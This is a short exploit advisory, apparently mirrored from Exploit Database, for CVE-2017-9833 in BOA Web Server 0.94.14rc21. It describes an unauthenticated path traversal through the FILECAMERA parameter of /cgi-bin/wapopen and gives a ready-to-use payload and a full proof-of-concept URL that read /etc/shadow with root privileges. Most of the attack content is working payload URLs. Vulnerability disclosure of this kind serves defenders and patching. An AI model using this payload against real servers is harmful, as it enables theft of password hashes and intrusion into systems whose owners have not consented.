BOA Web Server 0.94.14rc21 – Arbitrary File Access

• Exploit Database
• 13 阅读

• 作者： Miguel Mendez Z
  日期： 2017-06-20
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/42290/

• BOA Web Server 0.94.14 - Access to arbitrary files as privileges
  
  Title: Vulnerability in BOA Webserver 0.94.14
  Date: 20-06-2017
  Status: Vendor contacted, patch available
  Scope: Arbitrary file access
  Platforms: Unix
  Author: Miguel Mendez Z
  Vendor Homepage: http://www.boa.org
  Version: Boa Webserver 0.94.14rc21
  CVE: CVE-2017-9833
  
  
  Vulnerability description
  -------------------------
  -We can read any file located on the server
  The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials
  
  Vulnerable variable:
  FILECAMERA=../../etc/shadow%00
  
  Exploit link:
  /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0
  
  Poc:
  http://127.0.0.1/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0